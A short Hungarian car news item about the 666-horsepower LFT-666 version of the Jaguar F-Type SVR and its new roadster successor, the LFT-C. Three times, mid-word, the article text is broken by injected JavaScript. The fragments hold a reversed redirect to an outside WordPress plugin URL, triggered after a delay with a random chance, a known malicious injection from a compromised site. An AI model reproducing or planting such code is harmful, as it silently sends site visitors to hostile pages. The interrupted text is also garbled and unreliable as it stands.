Az LFT-666 tavaly ilyenkor jelent meg a színen, mint a Jaguar F-Type SVR megnövelt teljesítményű váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozata. Az 5,0 literes, kompresszoros motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor feltöltését, szívórendszerét és vezérlését átírva a blokk 666 lóerőt ad le, az autó 3,2 mp alatt gyorsul 100 km/órára. Az igényes kidolgozású autóból 99 darab készült, egyenként több mint 140 ezer angol fontért (az 575 lóerős, 3,7 másodperces gyorsulású gyári F-Type SVR listaára 112 ezer angol font). Most viszont toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további tíz autót építenek, igaz, már roadsterként. Az LFT-C névre keresztelt autó kézi kidolgozású utasteret, szénszálas karosszériapaneleket, egyedi kipufogórendszert kap, és persze a 666 lóerős V8-as is maradt, amelyre…
- Hirdetés -